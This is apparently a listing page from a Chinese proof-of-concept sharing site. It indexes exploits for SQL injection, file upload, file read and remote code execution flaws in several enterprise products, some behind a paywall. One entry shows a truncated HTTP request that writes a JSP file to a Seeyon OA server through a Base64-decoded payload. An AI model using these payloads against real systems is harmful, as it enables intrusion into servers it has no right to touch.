POC_秃兔安全

更新

浏览

【通用】JieLink+智能终端操作平台 DeleteIpPool sqli

fofa语句yakit插件 uuidpocyaml已验证

付费阅读500 # poc

dreamer2929个月前

08214

F-logic DataCube3存在命令执行漏洞(CVE-2024-7066)

2024你懂的

秃兔2年前

012514

赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞

2024你懂的

秃兔2年前

011314

方天云智慧平台系统 GetCompanyItem SQL注入漏洞

2024你懂的

秃兔2年前

014914

【通用】安恒安全网关 net_dynamic_pop_adv_submit 文件上传漏洞

fofayakit插件 uuidpocyaml注：文件会以时间戳md5的方式存储在/adv/image/md5(时间戳).php，所以前面只能验证是否存在可以上传的点具体上传成功的数据包需要爆破一把梭脚本已验证

付费阅读500 # poc

dreamer2921年前

015614

H3C Magic B1STV100R012 RCE

2024你懂的

秃兔2年前

09914

【通用】 NetMizer 日志管理系统dologin存在SQL注入漏洞

fofa语法yakit uuid pocyaml

付费阅读500 # poc # yakit # nuclei

dreamer2921年前

016714

金和OA_uploadfileeditorsave接口存在任意文件上传漏洞

2024你懂的

秃兔2年前

07313

【通用】金和OA C6-IncentivePlanFulfillAppprove sql注入漏洞

fofayakit插件 uuidpocyaml已验证

付费阅读500 # poc

dreamer2921年前

017413

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...

2024你懂的

秃兔2年前

011713

上一页 1…8 91011 12…55 下一页跳转